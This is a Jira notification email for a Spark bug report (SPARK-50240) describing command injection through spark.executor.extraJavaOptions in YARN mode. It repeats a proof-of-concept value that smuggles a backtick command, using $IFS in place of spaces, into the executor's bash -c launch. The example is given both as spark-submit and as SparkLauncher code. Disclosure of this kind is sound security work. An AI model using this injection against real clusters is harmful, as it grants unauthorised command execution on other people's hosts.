[
https://issues.apache.org/jira/browse/SPARK-50240?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Xiaotong updated SPARK-50240:
-----------------------------
Description:
We found that Spark allow user to upload jar packet with`extraJavaOptions` ,
When instantiating a JAR package, use the javaOption configuration construct to
execute the command if you configure the advanced optional parameters:
{color:#808080}spark.executor.extraJavaOption:{color}
{code:java}
\'touch\$IFS/tmp/zzz123|'{code}
The instance executes the jar package, uses the Yarn mode, and injects 'touch
/tmp/zzz123' into the bash -c execution command.
Command as:
{code:java}
spark-submit --class JavaWordCount --master yarn --deploy-mode client --conf
spark.executor.extraJavaOptions="\`touch\$IFS/tmp/zzz123\`" test.jar {code}
for java:
{code:java}
sparkLauncher.setConf("spark.executor.extraJavaOptions",
"`touch$IFS/tmp/zzz123`"); {code}
Spark execution location:
/yarn/src/main/scala/org/apache/spark/deploy/yarn/ExecutorRunnable.scala
was:
We found that Spark allow user to upload jar packet with`extraJavaOptions` ,
When instantiating a JAR package, use the javaOption configuration construct to
execute the command if you configure the advanced optional parameters:
{color:#808080}spark.executor.extraJavaOption:{color}
{code:java}
\'touch\$IFS/tmp/zzz123|'{code}
The instance executes the jar package, uses the Yarn mode, and injects 'touch
/tmp/zzz123' into the bash -c execution command.
Command as:
{code:java}
spark-submit --class JavaWordCount --master yarn --deploy-mode client --conf
spark.executor.extraJavaOptions="\`touch\$IFS/tmp/zzz123\`" test.jar {code}
for java:
{code:java}
sparkLauncher.setConf("spark.executor.extraJavaOptions",
"`touch$IFS/tmp/zzz123`"); {code}
Spark execution location:
!image-2024-11-12-10-49-35-069.png!
> Command Execution Vulnerability in Spark (JavaOptions)
> ------------------------------------------------------
>
> Key: SPARK-50240
> URL: https://issues.apache.org/jira/browse/SPARK-50240
> Project: Spark
> Issue Type: Bug
> Components: Spark Submit
> Affects Versions: 3.5.1
> Reporter: Xiaotong
> Priority: Critical
>
> We found that Spark allow user to upload jar packet with`extraJavaOptions` ,
>
> When instantiating a JAR package, use the javaOption configuration construct
> to execute the command if you configure the advanced optional parameters:
> {color:#808080}spark.executor.extraJavaOption:{color}
> {code:java}
> \'touch\$IFS/tmp/zzz123|'{code}
> The instance executes the jar package, uses the Yarn mode, and injects 'touch
> /tmp/zzz123' into the bash -c execution command.
> Command as:
> {code:java}
> spark-submit --class JavaWordCount --master yarn --deploy-mode client --conf
> spark.executor.extraJavaOptions="\`touch\$IFS/tmp/zzz123\`" test.jar {code}
> for java:
> {code:java}
> sparkLauncher.setConf("spark.executor.extraJavaOptions",
> "`touch$IFS/tmp/zzz123`"); {code}
> Spark execution location:
> /yarn/src/main/scala/org/apache/spark/deploy/yarn/ExecutorRunnable.scala
>
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
---------------------------------------------------------------------
To unsubscribe, e-mail: issues-unsubscr...@spark.apache.org
For additional commands, e-mail: issues-h...@spark.apache.org
